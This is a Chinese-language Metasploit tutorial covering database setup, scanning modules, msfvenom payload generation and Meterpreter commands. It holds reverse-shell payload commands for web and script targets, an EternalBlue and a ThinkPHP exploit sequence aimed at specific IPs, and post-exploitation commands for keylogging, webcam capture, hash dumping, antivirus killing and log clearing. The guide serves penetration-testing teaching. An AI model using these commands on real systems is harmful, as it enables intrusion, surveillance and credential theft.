Metasploit(MSF)基础超级详细版

MSF基础学习看这一篇就够了

  • Metasploit
    • 常见名词解释
    • MSF简介
    • MSF框架结构
    • MSF配置数据库
    • 内网主机发现
    • MSF命令查询
      • 常用命令
      • 数据库管理命令
      • 核心命令
      • 模块命令
      • 进程命令
      • 资源脚本命令
      • 后台数据库命令
      • 后端凭证命令
      • 开发者命令
      • 攻击载荷命令
    • MSF模块
    • MSF辅助扫描模块 - auxiliary
      • MSF主机发现
    • MSF服务扫描
      • Telnet服务模块
      • SSH服务模块
      • Oracle数据库扫描
      • SMB服务扫描
      • MSSQL服务扫描
      • FTP、SMTP、SNMP扫描
    • MSF端口扫描
      • WMAP
    • MSF攻击载荷模块
      • Payload类型
      • Stageless payload & Staged payload
    • Payload生成
      • MSF简介
      • MSF生成Payload
      • webpayload
      • 脚本payload
    • 漏洞利用模块
        • Windows-MS17-010
        • Linux - Thinkphp-RCE
    • Meterpreter扩展模块
      • meterpreter 特点
      • 进入meterpreter
      • advanced
      • meterpreter常用shell
      • meterpreter命令详解
        • 核心命令
        • 文件系统命令
        • 网络命令
        • 系统命令
        • 用户界面命令
        • 摄像头命令
        • 音频输出命令
        • 提权命令
        • 密码转储命令
        • Timetomp

Metasploit

常见名词解释

POC : Proof of Concept ,概念证明,用来证明漏洞存在的一段代码,没有攻击性。
EXP : Exploit ,利用,利用系统漏洞进行攻击的动作、方式、方法,具有攻击性。
Payload :有效载荷,指 Exploit 执行成功之后,真正在系统进行执行的代码或者指令。
Shellcode :一段用于利用漏洞而执行的代码,为16进制的机器码,由于其建立正向/反向 shell 而得名。
Client :客户端。
Team Server :服务端, C2 服务器, Beacon Payload 的控制器。
Beacon :是 Cobalt Strike 运行在目标主机上的 payload , Beacon 在隐蔽信道上我们提供服务,用于长期控制受感染主机。
C2 : Command & Control Server 的简称,也就是命令与控制。

MSF简介

The Metasploit Framework 的简称。 MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。
是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。
metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。

MSF框架结构

Kali-metasploit 框架目录路径

  1. data:包含metasploit用于存储某些漏洞、单词列表、图像等所需二进制文件的
    可编辑文件。
  2. documentation:包含框架的可用文档。
  3. lib:metasploit的库文件夹。
  4. plugins:用来存放metasploit的插件。
  5. scripts:用来存放metasploit的脚本,包括meterpreter及其它脚本。
  6. tools:存放多种的命令行实用程序。
  7. modules:存储metasploit的模块文件。

kali Metasploit 更新

msfconsole -v # 查看版本
apt-get update
apt-get install metasploit-framework

MSF配置数据库

Metasploit支持使用数据库来保存渗透测试过程中获取的各种数据

开启 postgresql 数据库

 service postgresql start

初始化 MSF 数据库

 msfdb init

创建数据库用户: msf
创建数据库: msf
创建数据库: msf_test
创建配置文件: /usr/share/metasploit-framework/config/database.yml
创建保存MSF框架信息所需数据表

启动 msfconsole

msfconsole

Metasploit(MSF)基础超级详细版_第1张图片

Msfconsole 是 Metasploit 框架用户接口,我们能通过 Msfconsole 接口使用Metasploit 中所有模块。

Msfconsole 主要用于:

  1. 管理 Metasploit 数据库
  2. 管理会话
  3. 配置启动 Metasploit 模块

启动 msfconsole 时,MSF会使用创建的 msf 用户自动登录到 msf 数据库

查看数据库连接状态

db_status

在这里插入图片描述

如果没有连接可以手工连接:

db_connect 用户名:口令@服务器地址:端口/数据库名称

在这里插入图片描述

内网主机发现


> db_nmap:该命令是 Nmap 的一个封装,与 Nmap 使用方法一样,其执行结果会自动输入到数据库当中。
> -PA:TCP ACK PING扫描
> -PS:TCP SYNPING扫描
> -PR:ARP扫描是nmap对目标进行一个arp ping扫描的过程,尤其在内网的情况 下。因为防火墙不会禁止ARP请求。
>  hosts:列出当前工作区所有主机 servers:列出当前工作区所有主机服务 端口、服务、版本探测
> -T[0-5]:默认为T3,T4表示最大TCP扫描延迟为10ms
> -sS:TCP SYN扫描
> -sA:TCP ACK扫描
> -sT:TCP 扫描
> -A:打开操作系统探测和版本探测 漏洞探测
> --script=vuln:检查是否具有常见漏洞

db_nmap -Pn -sV 171.16.1.0/24

Metasploit(MSF)基础超级详细版_第2张图片
以将Nmap扫描结果导出为一个输出文件,并导入渗透测试数据库中,只要在Nmap命令中加入-oX参数

nmap -Pn -sV -oX dmz 171.16.1.106/24

扫描结束后,在当前目录下生成名为dmz的文件,可以在msf终端中导入数据库中

db_import /root/dmz

db_import命令还能识别 Acunetix,Amap,Appscan,Burp Session,Microsoft Baseline Security Analyzer,Nessus,NetSparker,NeXpose,OpenVAS Report,Rentina 等扫描器的结果。

MSF命令查询

常用命令

show exploits – 查看所有可用的渗透攻击程序代码
show auxiliary – 查看所有可用的辅助攻击工具
[show ]options/advanced – 查看该模块可用选项
show payloads – 查看该模块适用的所有载荷代码
show targets – 查看该模块适用的攻击目标类型
search – 根据关键字搜索某模块
info – 显示某模块的详细信息
use – 使用某渗透攻击模块
back – 回退
set/unset – 设置/禁用模块中的某个参数
setg/unsetg – 设置/禁用适用于所有模块的全局参数

数据库管理命令

msfdb init             # 启动并初始化数据库
msfdb reinit           # 删除并重新初始化数据库
msfdb delete           # 删除并停止使用数据库
msfdb start           # 启动数据库
msfdb stop             # 停止数据库
msfdb status           # 检查服务状态
msfdb run             # 启动数据库并运行msfconsole

核心命令

?             帮助菜单
banner       显示 Metasploit banner信息
cd           更改当前工作目录
color         切换颜色
connect       与主机通信
debug         显示对调试有用的信息
exit         退出控制台
features     显示可以选择加入的尚未发布的功能列表
get           获取特定变量的值
getg         获取全局变量的值
grep         筛选以一条命令的输出
help         帮助菜单
history       显示命令历史记录
load         加载框架插件
quit         退出控制台
repeat       重复一个命令列表
route         通过一个session会话路由流量
save         保存活动的数据存储
sessions     导出会话列表并显示会话信息
set           将一个特定环境的变量设置为一个值
setg         将一个全局变量设置为一个值
sleep         在指定的秒数内不执行任何操作
spool         将控制台输出写入文件以及屏幕
threads       查看和操作后台线程
tips         显示有用的提示清单
unload       卸载框架插件
unset         取消设置的一个或多个变量
unsetg       取消设置一个或多个全局变量
version       显示框架和控制台库版本号

模块命令

advanced     显示一个或多个模块的高级选项
back         从当前环境返回
clearm       清除模块堆栈
favorite     将模块添加到最喜欢的模块列表中
info         显示一个或多个模块的详细信息
listm         列表中的模块栈
loadpath     从路径中搜索并加载模块
options       显示一个或多个模块全局选项
popm         将最新的模块从堆栈中弹出并使其处于活动状态
previous     将之前加载的模块设置为当前模块
pushm         将活动模块或模块列表推送到模块堆栈
reload_all   重新加载所有模块
search       搜索模块名称和描述
show         显示给定类型的的模块或所有模块
use           通过名称或搜索词/索引选择使用模块

进程命令

handler       启动一个payload处理程序作为job
jobs         显示和管理 jobs
kill         杀掉一个job
rename_job   重命名一个job

资源脚本命令

makerc       将从开始输入的命令保存到文件中
resource     运行存储在文件中的命令

后台数据库命令

analyze           分析关于一个特定地址或地址范围的数据库信息
db_connect       连接到一个现有的数据服务
db_disconnect     与当前的数据服务断开连接
db_export         导出一个包含数据库内容的文件
db_import         导入扫描结果文件(文件类型将被自动检测)
db_nmap           执行nmap并自动记录输出
db_rebuild_cache 重建数据库存储的模块缓存(已废弃)
db_remove         删除已保存的数据服务条目
db_save           将当前的数据服务连接保存为默认,以便在启动时重新连接
db_status         显示当前的数据服务状态
hosts             列出数据库中的所有主机
loot             列出数据库中的所有战利品
notes             列出数据库中的所有笔记
services         列出数据库中的所有服务
vulns             列出数据库中的所有漏洞
workspace         在数据库工作空间之间切换

后端凭证命令

 creds         列出数据库中的所有凭证

开发者命令

edit         用首选编辑器编辑当前模块或文件
irb           在当前环境下打开一个交互式Ruby shell
log           如果可能的话,将framework.log分页显示到最后。
pry           在当前模块或框架上打开 Pry 调试器
reload_lib   从指定路径重新加载Ruby库文件
time         运行一个特定命令所需的时间

攻击载荷命令

check 检查一个目标是否易受攻击
generate 生成一个有效载荷
reload 从磁盘重新加载当前的模块
to_handler 用指定的有效载荷创建一个处理程序

MSF模块

模块是通过Metasploit框架装载集成对外提供的最核心的渗透测试功能实现代码。
MSF所有的漏洞测试都是基于模块。

auxiliary :辅助模块 辅助渗透(端口扫描、登录密码爆破、漏洞验证等)
用于辅助操作的模块,例如网络扫描、枚举、漏洞扫描、登录暴力破解、模糊测试、 蜘蛛(遍历)、数据提取等;
辅助模块能在渗透之前得到目标系统丰富的情报信息,从而发起更具目标性的精准攻 击。 包括针对各种网络服务的扫描与查点、构建虚假服务收集登录密码口令破解、敏 感信息嗅探、fuzz、实施网络协议欺骗等模块

exploits :漏洞利用模块 包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。 命名规则:操作系统/各种应用协议分类
用于利用漏洞和传递有效负载的模块。有远程漏洞利用、本地漏洞利用、权限提升漏 洞利用、客户端漏洞利用、Web 应用程序漏洞利用和许多其他漏洞。
利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以植入和运行攻击载荷,从而获得对目标系统访问控制权的代码组件。metasploit框架中渗透攻击模块可以按照所利用的安全漏洞所在的位置分为主动渗透攻击与被动渗透攻击两大类。

payloads: 攻击载荷 主要是攻击成功后在目标机器执行的代码,比如反弹shell的代码、 用于在利用期间执行操作的模块,例如建立Meterpreter 会话、反向 shell、执行命 令、下载和执行程序等。攻击载荷是在渗透攻击成功后在目标系统运行的一段植入代码,通常是为渗透攻击者打开在目标系统上的控制会话连接。在传统的渗透代码开发中,攻击载荷只是一段功能简单的ShellCode代码,以汇编语言编制并转换为目标系统CPU体系结构支持的机 器代码,在渗透攻击触发漏洞后,将程序执行流程劫持并跳转入这段机器代码中执 行,从而完成ShellCode中实现的单一功能。

post:后渗透阶段模块 漏洞利用成功获得meterpreter之后,向目标发送的一些功能性指令,如:提权等
用于在拿到权限后进行后渗透利用操作的模块,例如凭证/哈希转储、本地权限提升、后门安装、敏感数据提取、网络流量隧道(代理)、键盘记录、屏幕捕获和许多 其他操作。

encoders :编码器模块 主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检测和过滤系统 用于有效负载编码和加密的模块,例如 base64、XOR、shikata_ga_nai 等。这有助 于混淆以规避防病毒或NIDS(网络入侵检测系统)、EDR(端点检测和响应)等防 御。

evasion :躲避模块 用来生成免杀payload 用于规避防御的模块,例如防病毒规避、AppLocker 绕过、软件限制策略 (SRP) 绕过等。

nops:空指令模块 空指令就是空操作,提高paylaod稳定性及维持大
用于生成无害、良性的“无操作”指令的模块,例如用于填充目的、在利用期间在内存 中滑动等。
是一些对程序运行状态不会造成任何实质影响的空操作或无关操作指令。
在渗透攻击构造恶意数据缓冲区时,常常要在真正要执行Shellcode时,有一个较大的安全着陆区,从而避免受到内存地址随机化、返回地址计算偏差等原因造成的 Shellcode执行失败,从而提高渗透攻击的可靠性。
metasploit框架中的空指令模块就是用来在攻击载荷中添加空指令区,以提高攻击可 靠性的组件。

MSF辅助扫描模块 - auxiliary

MSF主机发现

模块路径

modules/auxiliary/scanner/discovery/

Metasploit(MSF)基础超级详细版_第3张图片
搜索模块
Metasploit(MSF)基础超级详细版_第4张图片arp_sweep:使用arp请求枚举本地局域网中的所有活跃主机
udp_sweep:通过发送UDP数据包探查指定主机是否活跃,并发现主机上udp服务。

模块使用
arp_sweep模块使用方法

use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 171.166.1.0/24
set THREADS 50
run

Metasploit(MSF)基础超级详细版_第5张图片

MSF服务扫描

服务扫描
确定开放端口后,对相应端口上所运行的服务信息进行挖掘
模块搜索
在 Metasploit 的 Scanner 辅助模块中,用于服务扫描和查点的工具常以
[service_name]_version 和 [service_name]_login 命名。

[service_name]_version :可用于遍历网络中包含了某种服务的主机,并进一步确定服务的版本
[service_name]_login :可对某种服务进行口令探测攻击

在MSF终端中可以输入:

 search login

可查看所有服务登录口令探测模块

Metasploit(MSF)基础超级详细版_第6张图片
在MSF终端中可以输入:

search version

查看所有可用的服务探测模块
Metasploit(MSF)基础超级详细版_第7张图片

Telnet服务模块

模块搜索

search scanner/telnet

Metasploit(MSF)基础超级详细版_第8张图片

telnet登录
auxiliary/scanner/telnet/telnet_login
扫描telnet版本
auxiliary/scanner/telnet/telnet_version

模块使用

use auxiliary/scanner/telnet/telnet_version
set RHOSTS xxx.xxx.xxx/24
set THREADS 100
run

Metasploit(MSF)基础超级详细版_第9张图片

SSH服务模块

模块搜索

search scanner/ssh

Metasploit(MSF)基础超级详细版_第10张图片
模块使用

ssh登录
auxiliary/scanner/ssh/ssh_login
ssh公共密钥认证登录
auxiliary/scanner/ssh/ssh_login_pubkey
扫描ssh版本测试
auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ssh/ssh_version
set RHOSTS xx.xx.xx.x/24
set THREADS 100
run

使用options可以查看需要设置的参数,YES是需要配置的,不进行配置的话使用默认值。

Oracle数据库扫描

模块搜索

search scanner/orcale

Metasploit(MSF)基础超级详细版_第11张图片模块使用对应上边即可。 options查看需要设置的参数。
Metasploit(MSF)基础超级详细版_第12张图片

SMB服务扫描

模块搜索

search scanner/smb

Metasploit(MSF)基础超级详细版_第13张图片

SMB枚举
auxiliary/scanner/smb/smb_enumusers

返回DCERPC信息
auxiliary/scanner/smb/pipe_dcerpc_auditor

扫描SMB2协议
auxiliary/scanner/smb/smb2

扫描smb共享文件
auxiliary/scanner/smb/smb_enumshares

枚举系统上的用户
auxiliary/scanner/smb/smb_enumusers

SMB登录
auxiliary/scanner/smb/smb_login

扫描组的用户
auxiliary/scanner/smb/smb_lookupsid

扫描系统版本
auxiliary/scanner/smb/smb_version

MSSQL服务扫描

模块搜索

search scanner/mssql

Metasploit(MSF)基础超级详细版_第14张图片

MSSQL登陆工具
scanner/mssql/mssql_login

测试MSSQL的存在和信息
scanner/mssql/mssql_ping

FTP、SMTP、SNMP扫描

FTP模块搜索

search scanner/ftp
ftp版本扫描
scanner/ftp/ftp_version
ftp匿名登录扫描
scanner/ftp/anonymous

SMTP模块搜索

search scanner/smtp
smtp枚举
auxiliary/scanner/smtp/smtp_enum
扫描smtp版本
auxiliary/scanner/smtp/smtp_version

SNMP模块搜索

search scanner/snmp

MSF端口扫描

模块路径

modules/auxiliary/scanner/portscan/

Metasploit(MSF)基础超级详细版_第15张图片模块搜索

search scanner/portscan

Metasploit(MSF)基础超级详细版_第16张图片

auxiliary/scanner/protscan/ack
//通过ACK扫描的方式对防火墙上未被屏蔽的端口进行探测
auxiliary/scanner/protscan/ftpbounce
//通过FTP bounce攻击的原理对TCP服务进行枚举,一些新的FTP服务器软件能很
好的防范此攻击,但在旧的系统上仍可以被利用
auxiliary/scanner/protscan/syn
//使用发送TCP SYN标志的方式探测开放端口
auxiliary/scanner/protscan/tcp
//通过一次完整的TCP连接来判断端口是否开放 最准确但是最慢
auxiliary/scanner/protscan/xmas
//一种更为隐秘的扫描方式,通过发送FIN,PSH,URG标志,能够躲避一些高级的TCP标记检测器的过滤

一般情况下推荐使用syn端口扫描器,速度较快,结果准确,不易被对方察觉

模块使用

use auxiliary/scanner/protscan/syn
set RHOSTS IP地址
set THREADS 20
run

Metasploit(MSF)基础超级详细版_第17张图片

WMAP

Web应用辅助扫描,漏洞查找等模块基本都在 modules/auxiliary/ 下,
Metasploit内置了wmap WEB扫描器,要先创建一个数据库用来存放扫描数据,初始化wmap。

load wmap
help wmap

Metasploit(MSF)基础超级详细版_第18张图片使用wmap扫描

msf > wmap_sites -a http://202.112.50.74 //添加要扫描的网站
msf > wmap_sites -l
msf > wmap_targets -t http://202.112.20.74 //把添加的网站作为扫描目标
msf > wmap_run -t   //查看那些模块将在扫描中使用
msf > wmap_run -e   //开始扫描
msf > vulns     //查看漏洞信息

MSF攻击载荷模块

模块路径

/usr/share/metasploit-framework/modules/payloads

Metasploit(MSF)基础超级详细版_第19张图片

payload又称为攻击载荷,主要是用来建立目标机与攻击机稳定连接的,可返回shell,也可以进行程序注入等。

Payload类型

singles
独立载荷,可直接植入目标系统并执行相应的程序,如:shell_bind_tcp这个payload。

stagers
传输器载荷,用于目标机与攻击机之间建立稳定的网络连接,与传输体载荷配合攻击。通常该种载荷体积都非常小,可以在漏洞利用后方便注入,这类载荷功能都非常相似,大致分为bind(正向)型和reverse(反向)型,bind型是需要攻击机主动连接目标端口的;而reverse型是目标机会反连接攻击机,需要提前设定好连接攻击机的ip地址和端口号。

stages
传输体载荷,如shell,meterpreter等。在stagers建立好稳定的连接后,攻击机将stages传输给目标机,由stagers进行相应处理,将控制权转交给stages。比如得到目标机的shell,或者meterpreter控制程序运行。这样攻击机可以在本端输入相应命令控制目标机。
meterpreter其实就是一个payload,它需要stagers和相应的stages配合运行,
meterpreter是运行在内存中的,通过注入dll文件实现,在目标机硬盘上不会留下文件痕迹,所以在被入侵时很难找到。

Stageless payload & Staged payload

payload分为staged(分阶段)和stageless(不分阶段):

 Stageless payload: <platform>/[arch]/<single>

Stageless Meterpreter 是一个二进制文件,包含Meterpreter的所有必需部分以及所有必需的扩展全部捆绑在 一起,将完整的payload都编译在木马中,体积庞大,可直接独立地植入目标系统进行执行

Staged payload: <platform>/[arch]/<stage>/<stager>

Staged Meterpreter 负责建立目标用户与攻击者之间的网络连接,将执行传递到另一个阶段,MSF提供了传输器和传输体配对分阶段植入的技术,由渗透攻击模块首先植入代码,短小精悍且可靠的传输器载荷,然后在运行传输器载荷时进一步下载传输体载荷并执行,比如加载meterpreter、VNC桌面控制等复杂的大型攻击载荷。
stageless和staged就像web入侵里面提到的大马和小马一样,一个功能齐全,一个只是构造一个连接或命令执 行,还需通过其他工具和脚本进行管理。

Metasploit(MSF)基础超级详细版_第20张图片

Payload生成

MSF简介

Msfvenom — Metasploit 独立有效负载生成器,是用来生成后门的软件,在目标机上执行后门上线。

MSF生成Payload

msfvenom选项
Options:

-p:–payload,指定特定的 Payload,如果被设置为-,那么从标准输入流中读取。几乎支持全平台。 指定操作系统

-l:–list,列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, all

-n:–nopsled,指定 nop在 payload中的数量

-f:–format,指定 Payload的输出格式(–listformats:列出所有可用的输出格式) php exe

-e:–encoder,指定使用编码的encoder

X86/shikata_ga_nai最流行的编码,等级为excellent;

解码和编码过程都是随机生成的;cmd/powershell_base64也为excellent;

-a:–arch,指定目标系统架构 arm-安卓 x86 mips工业系统-路由器-交换机

–platform:指定目标系统平台 linus windows ios 安卓

-s:–space,设置未经编码的 Payload的最大长度(–encoder-space:编码后的 Payload的最大长度)

-b:–bad-chars,设置需要在 Payload中避免出现的字符,例如:’\0f’、’\x00’等

-i:–iterations,设置 Payload的编码次数

–smallest:尽可能生成最短的 Payload

-o:–out,保存 Payload到文件

-c:–add-code,指定一个附加的win32 shellcode文件

-x:–template,指定一个特定的可执行文件作为模板

-k:–keep,保护模板程序的功能,注入的payload作为一个新的进程运行

webpayload

php:
msfvenom-p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
asp:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f aspx - o shell.aspx
jsp:
Msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
war:
msfvenom-p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war

脚本payload

python:
msfvenom-p python/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
bash:
msfvenom-p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
perl:
msfvenom-p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
PowerShell:
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f psh > shell.ps1
powershell.exe -ExecutionPolicy Bypass -File shell.ps1

漏洞利用模块

模块路径

/usr/share/metasploit-framework/modules/exploits

Metasploit(MSF)基础超级详细版_第21张图片

Windows-MS17-010
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.3.23
check //检测目标是否存在漏洞
run //运行攻击模块
Linux - Thinkphp-RCE
search thinkphp
use exploit/unix/webapp/thinkphp_rce
set rhosts ip
set rport 9000
set srvport 38080
set lhost 124.71.45.28
set lport 4567
set ReverseListenerBindAddress 192.168.0.141
run

Meterpreter扩展模块

meterpreter 特点

Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。不需要访问目标主机磁盘,所以也没什么入侵的痕迹。除上述外,Meterpreter还支持Ruby脚本形式的扩展。所以Ruby语言还很有必要的。

进入meterpreter

background:将当前session挂起
sessions[ -l]:列出当前所有的session  
sessions[ -i] id:进入某个session

常用命令

background 放回后台
exit 关闭会话
help 帮助信息
sysinfo系统平台信息
screenshot 屏幕截取
shell 命令行shell (exit退出)  
getlwd 查看本地目录
lcd 切换本地目录
getwd 查看目录
ls 查看文件目录列表
cd 切换目录
rm 删除文件
download C:\\1.txt 1.txt 下载文件
upload /var/www/wce.exe wce.exe 上传 文件
search -d c: -f *.doc 搜索文件
execute -f cmd.exe -i 执行程序/命令
ps 查看进程
getuid 查看当前用户权限 run killav 关闭杀毒软件
run getgui-e 启用远程桌面

advanced

//经常遇到假session或者刚连接就断开,可以在接收到session后,继续监听端口,保持job存活

msf5 exploit(multi/handler) > set ExitOnSessionfalse
//默认情况下,如果一个会话将在5分钟(300秒)没有任何活动,那么它会被杀死,为防止此情况可将此项修改为0

msf5>exploit(multi/handler)>set SessionCommunicationTimeout0
//默认情况下,一个星期(604800秒)后,会话将被强制关闭,修改为0可永久不会被关

msf5>exploit(multi/handler)>set SessionExpirationTimeout0
//后台持续监听,-j表示后台任务,-z表示成功后不主动发送stage,使用jobs命令查看和管理后台任务。jobs -K结束所有任务

msf5 exploit(multi/handler) > exploit -j -z
//快捷建立监听的方式:

Msf5>handler – H 192.168.114.130 -P 5449 windows/meterpreter/reverse_tcp

[] Payload handler running as background job 1.

[] Started reverse TCP handler on 192.168.24.146:5449
Set EnableStagrEncoding ture //对发送的atag流量进行加密,来对抗流量检测

meterpreter常用shell

reverse_tcp

基于TCP的反弹shell:

linux/x86/meterpreter/reverse_tcp

windows/meterpreter/reverse_tcp

reverse_http

基于http方式的反向连接,在网速慢的情况下不稳定。

windows/meterpreter/reverse_https

bind_tcp

基于TCP的正向连接shell,因为在内网跨网段时无法连接到攻击者的机器,所以在内网中经常会使用,不需要设置LHOST。

linux/x86/meterpreter/bind_tcp

meterpreter命令详解

核心命令
?           – 帮助菜单
background – 将当前会话移动到后台
bg         - background的别名
bgkill     – 总之后台 meterpreter 脚本
bglist     – 列出后台运行中的脚本
bgrun       – 作为一个后台线程运行脚本
channel     – 显示活动频道
close       – 关闭通道
disable_unicode_encoding   - 禁用unicode字符串的编码
enable_unicode_encoding     - 启用unicode字符串的编码
exit       – 终止 meterpreter 会话
help       – 帮助菜单
info       - 显示有关Post模块的信息
irb         - 在当前会话上打开交互式 Ruby 外壳
load       - 加载一个或多个meterpreter扩展
machine_id - 获取连接到会话的计算机的 MSF ID
migrate     - 将服务迁移到另一个进程
pivot       - 管理pivot侦听器
pry         - 打开当前会话上的pry调试器
quit       - 终止 meterpreter 会话
read       - 从通道中读取数据
resource   - 运行存储在文件中的命令
run         - 执行一个meterpreter 脚本 或者 Post模块
secure     - 在会话中协商TLV分组加密
sessions   - 快速切换到另外一个session
set_timeouts - 设置当前会话的超时值
sleep       - 强制meterpreter停止活动,然后重新建立会话
transport   - 改变目前的运输机制.
use         - 加载 meterpreter 的扩展,'load'的旧别名
uuid       - 获取当前会话的UUID
write       – 将数据写入到一个通道
文件系统命令
cat         - 读取并输出到标准输出文件的内容
cd         - 更改目录对受害人
checksum   - 检索文件的校验和
cp         - 将源复制到目标
dir         - 列出文件(别名为 ls)
download   - 下载文件或目录
edit       - 编辑文件
getlwd     - 输出本地工作目录
getwd       - 输出工作目录
lcd         - 更改本地工作目录
lls         - 列出本地文件
lpwd       - 输出本地工作目录
ls         - 列出当前目录中的文件列表
mkdir       - 创建目录
mv         - 将源移动到目标
rm         - 删除指定的文件
rmdir       - 删除目录
search     - 在目标主机文件系统上查找搜索文件 例如:search -d 
c:\\ -f *.doc 在目标主机C盘下搜索doc文档
show_mount - 列出所有装载点/逻辑驱动器
upload     - 上传文件或目录
网络命令
arp         - 显示主机ARP缓存
getproxy   - 显示当前代理配置
ifconfig   - 显示网络接口的关键信息
ipconfig   - 显示网络接口的关键信息
netstat     - 显示网络连接
portfwd     - 将本地端口转发到远程服务
             例如:portfwd add -l 1122 -p 3389 -r 
192.168.250.176把目标主机192.168.250.176的3389端口转发到1122端口
resolve     - 解析目标上的一组主机名
route       - 查看或加入受害者路由表 route add 5.5.5.0 
255.255.255.0 1 用sessions 1会话加入指定网段
系统命令
clearev     - 清除事件日志
drop_token - 放弃任何活动模拟令牌。
execute     - 执行命令,在目标主机上运行某个程序 execute -f 
notepad.exe ,执行目标主机上的记事本程序,隐藏后台执行,加参数-H
getenv     - 获取一个或多个环境变量值
getpid     - 获取当前进程 ID (PID)
getprivs   - 尝试启用当前进程可用的所有权限
getsid     - 获取当前运行服务用户的SID
getuid     - 获取当前运行服务的用户
kill       - 终止进程
localtime   - 显示目标系统的本地日期和时间
pgrep       - 按名称显示进程
pkill       - 按名称终止进程
ps         - 列出正在运行的进程
reboot     - 重新启动受害人的计算机
reg         - 与受害人的注册表进行交互
rev2self   - 在受害者机器上调用 RevertToSelf()
shell       - 在远程计算机上打开一个shell
shutdown   - 关闭远程计算机
steal_token - 试图窃取指定的 (PID) 进程的令牌
suspend     - 挂起或恢复进程列表
sysinfo     - 获取关于远程系统的信息,如操作系统
用户界面命令
enumdesktops   - 列出所有可访问的desktops和Windows
getdesktop     - 获取当前的 meterpreter 桌面
idletime       - 检查长时间以来,受害者系统空闲进程
keyboard_send   - 发送一个键盘记录器
keyevent       - 发送key事件
keyscan_dump   - 转储键盘记录器缓冲区内容
keyscan_start   - 启动键盘记录器
keyscan_stop   - 停止键盘记录器
mouse           - 发送鼠标事件
screenshare     - 实时监视远程用户的桌面
screenshot     - 抓取交互式桌面的屏幕截图
setdesktop     - 更改 meterpreter 当前桌面
uictl           - 启用用户界面组件的一些控件
摄像头命令
record_mic     - 从默认麦克风记录音频X秒
webcam_chat     - 启动视频聊天
webcam_list     - 列出摄像头
webcam_snap     - 从指定的网络摄像头获取snapshot
webcam_stream   - 从指定的网络摄像头播放视频流
音频输出命令
play   - 在目标系统上播放波形音频文件(.wav)
提权命令
getsystem   - 获得系统管理员权限
密码转储命令
hashdump - 抓取哈希密码 (SAM) 文件中的值
hashdump 可以跳过杀毒软件,但现在有两个脚本,都更加隐蔽,”run hashdump”和”run smart_hashdump”。
Timetomp
timestomp   - 操作修改文件的MACE属性
Modified:修改时间
Accessed:访问时间
Created:创建时间
Entry Modified: 条目修改时间

你可能感兴趣的:(#,渗透测试-MSF,安全,网络安全,web安全,系统安全,安全性测试)